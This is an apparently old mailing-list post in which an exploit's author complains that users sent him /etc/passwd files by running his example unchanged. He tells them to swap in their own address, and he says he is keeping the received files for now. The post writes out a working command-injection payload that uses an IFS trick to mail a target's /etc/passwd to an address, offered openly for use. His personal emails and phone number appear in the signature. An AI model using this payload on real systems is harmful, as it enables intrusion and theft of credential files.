I'm writing this because I received over 1M of mail containing /etc/passwd
files from all over the world. So PEOPLE, please STOP sending me your
password files. The exploit I provided was just an EXAMPLE. I'm glad you
liked it. At first it was fun to receive 2 or 3 /etc/passwd's per hour,
but now it's getting me quite confused and angry. So for all of you
out there, please REPLACE my e-mail address (drazvan@pop3.kappa.ro) from
the exploit with your own address. It's much more useful... :)
So, you should use
|IFS=5;CMD=5mail5your_address\@your_computer.com\</etc/passwd;eval$CMD;echo
For God's sake, I hope 'your_address@your_computer.com' is NOT a valid
e-mail address as is. :)
I assure you I have no intention to use the information I accidentaly
received in any way. I will delete it. I'm just keeping it for now for
statistics :).
I hope I have not offended anyone with this. If I did, I'm sorry.
Be good.
Razvan
-- Razvan Dragomirescu drazvan@kappa.ro, drazvan@romania.ro, drazvan@roedu.net Phone: +40-1-6866621 "Smile, tomorrow will be worse" (Murphy)